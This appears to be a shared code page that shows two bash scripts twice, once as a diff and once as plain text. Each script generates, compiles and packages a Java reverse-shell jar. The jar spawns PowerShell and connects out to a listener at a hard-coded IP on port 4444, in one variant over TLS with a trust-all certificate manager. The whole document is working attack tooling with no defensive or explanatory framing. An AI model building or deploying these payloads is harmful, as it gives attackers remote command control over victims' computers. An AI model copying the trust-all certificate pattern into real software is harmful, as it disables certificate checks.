unbaiat · April 15, 2020 08:06
diff --git a/generate-java-reverse-shell-ssl.sh b/generate-java-reverse-shell-ssl.sh
 #!/bin/bash
 # This is not great...
 #
 NAME=Shell
 TAC=TrustAllCertificates
 LHOST=10.0.0.254
 LPORT=4444
 COMMAND='"powershell"'

 CURDIR=$(pwd)
 BUILDDIR=$(mktemp -d)
 cd "${BUILDDIR}"

 cat > "${TAC}.java" << EOF
 import java.security.cert.CertificateException;
 import java.security.cert.X509Certificate;
 import javax.net.ssl.X509TrustManager;

 public class ${TAC} implements X509TrustManager {
    public void checkClientTrusted(X509Certificate[] certs, String authType) {
    }
 
    public void checkServerTrusted(X509Certificate[] certs, String authType) {
    }
 
    public X509Certificate[] getAcceptedIssuers() {
        return null;
    }
 }
 EOF

 cat > "${NAME}.java" << EOF
 import java.io.IOException;
 import java.io.InputStream;
 import java.io.OutputStream;
 import java.net.Socket;
 import javax.net.ssl.*;
 import java.io.InputStreamReader;
 import java.io.BufferedReader;

 public class ${NAME} {
  public static void main(String[] args) throws Exception {
    String host = "${LHOST}";
    int port = ${LPORT};
    String[] cmd = {${COMMAND}};

    Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
    SSLContext sslContext = SSLContext.getInstance("TLS");
    sslContext.init(null, new TrustManager[] {new ${TAC}()}, new java.security.SecureRandom());
    SSLSocketFactory sslSocketFactory = sslContext.getSocketFactory();
    SSLSocket s = (SSLSocket) sslSocketFactory.createSocket(host, port);
    s.startHandshake();
    InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
    BufferedReader bsi = new BufferedReader(new InputStreamReader(s.getInputStream()));
    OutputStream po = p.getOutputStream(), so = s.getOutputStream();
    while(!s.isClosed()) {
      while(pi.available()>0)
        so.write(pi.read());
      while(pe.available()>0)
        so.write(pe.read());
      // https://stackoverflow.com/questions/26320624/how-to-tell-if-java-sslsocket-has-data-available
      // while(si.available()>0)
        // po.write(si.read());
      String line = bsi.readLine();
      if (line != null) {
        po.write((line + "\n").getBytes());
      }
      else {
        bsi.close();
      }
      so.flush();
      po.flush();
      Thread.sleep(50);
      try {
        p.exitValue();
        break;
      }
      catch (Exception e){
      }
    };
    p.destroy();
    s.close();
  }
 }
 EOF
 cat "${TAC}.java"
 cat "${NAME}.java"
 mkdir META-INF
 echo "Main-Class: ${NAME}" > META-INF/MANIFEST.MF
 javac --release 7 -d . *.java
 jar cmvf META-INF/MANIFEST.MF shell.jar *.class
 mv shell.jar ${CURDIR}/shell_$(date '+%s').jar
 cd ${CURDIR}
 rm -rf "${BUILDDIR}"
diff --git a/generate-java-reverse-shell.sh b/generate-java-reverse-shell.sh
 #!/bin/bash
 NAME=Shell
 LHOST=10.1.1.1
 LPORT=4444
 COMMAND=powershell.exe

 CURDIR=$(pwd)
 BUILDDIR=$(mktemp -d)
 cd "${BUILDDIR}"

 cat > "${NAME}.java" << EOF
 import java.io.IOException;
 import java.io.InputStream;
 import java.io.OutputStream;
 import java.net.Socket;

 public class ${NAME} {
  public static void main(String[] args) throws Exception {
    String host = "${LHOST}";
    int port = ${LPORT};
    String cmd = "${COMMAND}";
    Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
    Socket s = new Socket(host,port);
    InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
    OutputStream po = p.getOutputStream(), so = s.getOutputStream();
    while(!s.isClosed()) {
      while(pi.available()>0)
        so.write(pi.read());
      while(pe.available()>0)
        so.write(pe.read());
      while(si.available()>0)
        po.write(si.read());
      so.flush();
      po.flush();
      Thread.sleep(50);
      try {
        p.exitValue();
        break;
      }
      catch (Exception e){
      }
    };
    p.destroy();
    s.close();
  }
 }
 EOF
 cat "${NAME}.java"
 mkdir META-INF
 echo "Main-Class: ${NAME}" > META-INF/MANIFEST.MF
 javac --release 7 -d . "${NAME}".java
 jar cmvf META-INF/MANIFEST.MF shell.jar "${NAME}".class
 mv shell.jar ${CURDIR}/shell_$(date '+%s').jar
 cd ${CURDIR}
 rm -rf "${BUILDDIR}"
	#!/bin/bash
	# This is not great...
	#
	NAME=Shell
	TAC=TrustAllCertificates
	LHOST=10.0.0.254
	LPORT=4444
	COMMAND='"powershell"'

	CURDIR=$(pwd)
	BUILDDIR=$(mktemp -d)
	cd "${BUILDDIR}"

	cat > "${TAC}.java" << EOF
	import java.security.cert.CertificateException;
	import java.security.cert.X509Certificate;
	import javax.net.ssl.X509TrustManager;

	public class ${TAC} implements X509TrustManager {
	public void checkClientTrusted(X509Certificate[] certs, String authType) {
	}

	public void checkServerTrusted(X509Certificate[] certs, String authType) {
	}

	public X509Certificate[] getAcceptedIssuers() {
	return null;
	}
	}
	EOF

	cat > "${NAME}.java" << EOF
	import java.io.IOException;
	import java.io.InputStream;
	import java.io.OutputStream;
	import java.net.Socket;
	import javax.net.ssl.*;
	import java.io.InputStreamReader;
	import java.io.BufferedReader;

	public class ${NAME} {
	public static void main(String[] args) throws Exception {
	String host = "${LHOST}";
	int port = ${LPORT};
	String[] cmd = {${COMMAND}};

	Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
	SSLContext sslContext = SSLContext.getInstance("TLS");
	sslContext.init(null, new TrustManager[] {new ${TAC}()}, new java.security.SecureRandom());
	SSLSocketFactory sslSocketFactory = sslContext.getSocketFactory();
	SSLSocket s = (SSLSocket) sslSocketFactory.createSocket(host, port);
	s.startHandshake();
	InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
	BufferedReader bsi = new BufferedReader(new InputStreamReader(s.getInputStream()));
	OutputStream po = p.getOutputStream(), so = s.getOutputStream();
	while(!s.isClosed()) {
	while(pi.available()>0)
	so.write(pi.read());
	while(pe.available()>0)
	so.write(pe.read());
	// https://stackoverflow.com/questions/26320624/how-to-tell-if-java-sslsocket-has-data-available
	// while(si.available()>0)
	// po.write(si.read());
	String line = bsi.readLine();
	if (line != null) {
	po.write((line + "\n").getBytes());
	}
	else {
	bsi.close();
	}
	so.flush();
	po.flush();
	Thread.sleep(50);
	try {
	p.exitValue();
	break;
	}
	catch (Exception e){
	}
	};
	p.destroy();
	s.close();
	}
	}
	EOF
	cat "${TAC}.java"
	cat "${NAME}.java"
	mkdir META-INF
	echo "Main-Class: ${NAME}" > META-INF/MANIFEST.MF
	javac --release 7 -d . *.java
	jar cmvf META-INF/MANIFEST.MF shell.jar *.class
	mv shell.jar ${CURDIR}/shell_$(date '+%s').jar
	cd ${CURDIR}
	rm -rf "${BUILDDIR}"
	#!/bin/bash
	NAME=Shell
	LHOST=10.1.1.1
	LPORT=4444
	COMMAND=powershell.exe

	CURDIR=$(pwd)
	BUILDDIR=$(mktemp -d)
	cd "${BUILDDIR}"

	cat > "${NAME}.java" << EOF
	import java.io.IOException;
	import java.io.InputStream;
	import java.io.OutputStream;
	import java.net.Socket;

	public class ${NAME} {
	public static void main(String[] args) throws Exception {
	String host = "${LHOST}";
	int port = ${LPORT};
	String cmd = "${COMMAND}";
	Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
	Socket s = new Socket(host,port);
	InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
	OutputStream po = p.getOutputStream(), so = s.getOutputStream();
	while(!s.isClosed()) {
	while(pi.available()>0)
	so.write(pi.read());
	while(pe.available()>0)
	so.write(pe.read());
	while(si.available()>0)
	po.write(si.read());
	so.flush();
	po.flush();
	Thread.sleep(50);
	try {
	p.exitValue();
	break;
	}
	catch (Exception e){
	}
	};
	p.destroy();
	s.close();
	}
	}
	EOF
	cat "${NAME}.java"
	mkdir META-INF
	echo "Main-Class: ${NAME}" > META-INF/MANIFEST.MF
	javac --release 7 -d . "${NAME}".java
	jar cmvf META-INF/MANIFEST.MF shell.jar "${NAME}".class
	mv shell.jar ${CURDIR}/shell_$(date '+%s').jar
	cd ${CURDIR}
	rm -rf "${BUILDDIR}"